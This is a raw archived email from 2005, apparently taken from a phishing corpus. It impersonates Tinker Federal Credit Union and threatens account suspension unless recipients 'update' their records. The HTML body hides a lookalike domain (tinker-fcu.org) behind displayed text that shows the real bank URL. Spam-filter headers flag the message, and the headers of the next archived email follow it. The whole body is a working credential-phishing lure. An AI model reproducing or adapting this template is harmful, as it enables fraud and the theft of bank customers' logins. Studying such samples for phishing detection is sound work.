From: "Tinker Federal Credit Union" <service@tinkerfcu.org>
Reply-To: "Tinker Federal Credit Union" <service@tinkerfcu.org>
Message-Id: <@>
Organization:    6
To: food@monkey.org
Cc: jefrey@monkey.org, jeremie@monkey.org, jim@monkey.org,
	jose@monkey.org, kovacs@monkey.org, kra@monkey.org
Subject: Your Tinker Federal Credit Union Account Must To Be Updated!!
X-Mailer:    6
Mime-Version: 1.0
Content-Type: multipart/alternative;
	boundary="=====31853832257=_"
X-Spam-Flag: YES
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: *********
X-Spam-Status: Yes, score=9.0 required=5.0 tests=HTML_MESSAGE,
	HTML_OBFUSCATE_05_10,INVALID_MSGID,MIME_HTML_MOSTLY,MPART_ALT_DIFF,
	MSGID_NO_HOST,RCVD_IN_BL_SPAMCOP_NET,RCVD_IN_XBL,RCVD_NUMERIC_HELO,
	SORTED_RECIPS autolearn=no version=3.0.2
X-Spam-Report: 
	*  0.1 MSGID_NO_HOST Message-Id has no hostname
	*  1.2 RCVD_NUMERIC_HELO Received: contains an IP address used for HELO
	*  0.9 SORTED_RECIPS Recipient list is sorted by address
	*  1.0 MIME_HTML_MOSTLY BODY: Multipart message mostly text/html MIME
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.3 HTML_OBFUSCATE_05_10 BODY: Message is 5% to 10% HTML obfuscation
	*  0.1 MPART_ALT_DIFF BODY: HTML and text parts are different
	*  1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
	*      [Blocked - see <http://www.spamcop.net/bl.shtml?81.169.167.248>]
	*  3.1 RCVD_IN_XBL RBL: Received via a relay in Spamhaus XBL
	*      [81.169.167.248 listed in sbl-xbl.spamhaus.org]
	*  1.1 INVALID_MSGID Message-Id is not valid, according to RFC 2822
Status: O
X-Status: 
X-Keywords:                  
X-UID: 330

--=====31853832257=_
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7Bit

      
       
        

--=====31853832257=_
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7Bit

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<meta http-equiv="Content-Language" content="en-us">
<div id="message" dir="ltr">
  <table dir="ltr" cellSpacing="0" cellPadding="0" width="600" align="center" border="0">
    <tr>
      <td dir="ltr" colSpan="3">
      <p dir="ltr">
  <a href="https://tinkerhb.tinkerfcu.org/TinkerHB/HBNet/login/SecurityFAQ.aspx?organization=4875761A-71CB-421e-A243-B209F499C0F9&x8587=796325&x6972=584784" target="_blank">
  <img src="http://www.geocities.com/bani_zp/background.gif" border="0"></a><br>
      <b>Security Center</b></td>
    </tr>
 </table>
 
  <p dir="ltr"><font size="2"><font face="Verdana">Dear valued <strong>T<span style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">inker 
  Federal Credit Union<sup>®</sup></span> </strong>member</font>: </font></p>
  <p dir="ltr"><font face="Verdana" size="2">It has come to our attention that 
  your <span style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">
  <strong>Tinker Federal Credit Union<sup>®</sup></strong></span> account information needs to be <br>
  updated as part of our continuing commitment to protect your account and to
  <br>
  reduce the instance of fraud on our website. If you could please take 5-10 
  minutes <br>
  out of your online experience and update your personal records you will not 
  run into <br>
  any future problems with the online service. <br>
  &nbsp;</p>
  <p dir="ltr">However, failure to update your records will result in account 
  suspension. <br>
  Please update your records.<br>
  <br>
  Once you have updated your account records, your <strong>T<span style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">inker 
  Federal Credit Union</span></strong><span style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><strong><sup>®</sup></strong></span> session will not be <br>
  interrupted and will continue as normal. Go to the link below.<br>
  <a href="https://www.tinker-fcu.org/tinkerhb/hbnet/login/login.aspx/organization=4875761A-71CB-421e-A243-B209F499C0F9/?">
  https://tinkerhb.tinkerfcu.org/tinkerhb/hbnet/login/login.aspx?organization=4875761A-71CB-421e-A243-B209F499C0F9</a></p>
  <p dir="ltr">Thank You. <br>
  <strong>T<span style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">inker 
  Federal Credit Union</span></strong><span style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><strong><sup>® </sup>Security Center .</strong></span> </p>
  </font><font face="Verdana" size="1">
  <p dir="ltr">Accounts Management As outlined in our User Agreement, </font>
  <strong><font face="Verdana" style="font-size: 8pt">
  T</font><font face="Verdana" size="2"><span style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Verdana">inker 
  Federal Credit Union</span></font></strong><font face="Verdana" size="1"><span style="COLOR: black; FONT-FAMILY: Verdana"><strong>®</strong></span> 
  will <br>
  periodically send you information about site changes and enhancements. </p>
  <p dir="ltr">


</html>

--=====31853832257=_--

From apache@dpd.sk  Mon Oct 10 04:10:38 2005
Return-Path: <apache@dpd.sk>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 072DE536ED6
	for <jose@login.monkey.org>; Mon, 10 Oct 2005 04:10:38 -0400 (EDT)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id 36F8A6FA46F
	for <jose@monkey.org>; Mon, 10 Oct 2005 04:10:31 -0400 (EDT)
Received: from mail.dpd.sk (a3.dpd.ba.nextra.sk [195.168.8.115])
	by mail2.monkey.org (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 10 Oct 2005 04:10:31 -0400 (EDT)
Received: by mail.dpd.sk (Postfix, from userid 48)
	id 45E6E4C549E; Mon, 10 Oct 2005 09:41:04 +0200 (CEST)
To: jose@monkey.org
